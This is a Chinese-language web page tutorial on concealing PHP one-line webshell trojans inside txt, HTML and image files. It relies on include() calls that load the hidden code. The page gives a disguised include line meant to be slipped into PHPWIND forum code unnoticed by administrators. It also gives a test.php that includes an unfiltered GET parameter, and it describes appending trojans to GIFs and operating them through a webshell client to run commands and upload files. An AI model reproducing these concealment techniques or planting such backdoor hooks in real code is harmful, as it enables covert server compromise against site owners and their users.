程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> 如何隱藏PHP文件後門的技巧

如何隱藏PHP文件後門的技巧

編輯:關於PHP編程

最近很多朋友都在問我是否能把我那一句話木馬隱藏到HTML或圖片裡,其實把一句話木馬插入到PHP文件中就已經很隱蔽了,假如說硬是要放到HTML文件或圖片裡,就接著往下看的這篇測試報告吧。

要知道假如光把PHP語句放到圖片裡是無論如何也不能執行的,因為PHP只解析擴展名為php的文件。所以說要能使隱藏在圖片裡的PHP語句執行。我們就的借助PHP中的調用函數 :include 、require 等。

  我們還記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件裡用include("x.gif")這樣的語句來調用隱藏在圖片的木馬語句。ASP中語句也類似。看似非常隱蔽但直接調用圖片對稍微懂點PHP的人就不難發現可疑之處。由於URL 裡用GET方式很難傳遞參數,這就使得插入木馬的性能得不到發揮。

  Include 函數在PHP中使用的比較頻繁,所以引起的安全問題也實在太多,例如PHPWIND1.36的漏洞就是因為include後面的變量沒做過濾引起的。由此我們就可以構造類似的語句來插入到PHP文件中。然後把木馬隱藏到圖片或HTML文件裡,可以說隱蔽性就更高了。如在PHPWIND論壇裡插入下面的語句:

CODE:

<?@include includ/.$PHPWIND_ROOT;?>

一般治理員是無法看出來的。

  有了include 函數來輔助幫忙我們就可以把PHP木馬隱藏到 諸如 txt、html和圖片文件等很多類型的文件裡來了。因為txt、html和圖片文件這三種類型的文件最無論在論壇還是文章系統裡是最為常見的了,下面我們就依次來做測試。

  首先建立一PHP文件test.php 文件內容為:

CODE:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>

  Txt文件一般都是說明文件,所以我們把一句話木馬放到目錄的說明文件裡就OK了。隨便建立一個TXT文件t.txt。我們把一句話木馬粘貼到 t.txt文件裡。然後訪問 hxxp://localhost/test/test.php?test=../t.txt 假如你看到t.txt的內容就證實Ok了, 然後把在lanker微型PHP後門客戶端 木馬地址添入 hxxp://localhost/test/test.php?test=../t.txt 密碼裡添入cmd就可以了,執行返回的結果都可以看到。

  對於HTML的文件,一般都為模版文件。為了使插入到HTML的文件的木馬能被調用執行而且不被顯示出來,我們可以在HTML裡加入一個隱藏屬性的文本框 ,如: 然後使用方法同上。執行的返回結果一般都可以查看源文件看到。 如使用查看本程序目錄功能。查看源文件內容為 我可以得到目錄為 C:Uniserver2_7swwwtest。

  下面我們說說圖片文件,要說最為毒的一招莫過於把木馬隱藏到圖片裡。我們可以直接對一個圖片進行編輯,把插入到圖片末尾

  經測試一般都不會對圖片造成影響。然後同樣方法客戶端木馬地址添入

  我們查看PHP環境變量 返回的是結果是原圖片。

  這裡可能要和我們想象的結果有些差距了,其實命令已經運行了,只是返回的結果看不到而已,因為這是真正的GIF文件,所以是不會顯示返回結果的,為了證實是否真的執行了命令我們執行上傳文件命令。果不出所料,文件已經成功上傳到服務器上。這樣偽造的優點是隱蔽性好。缺點也自然不用說了是沒回顯。假如你想看到返回的結果,那就拿出記事本偽造一個假的圖片文件吧。

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved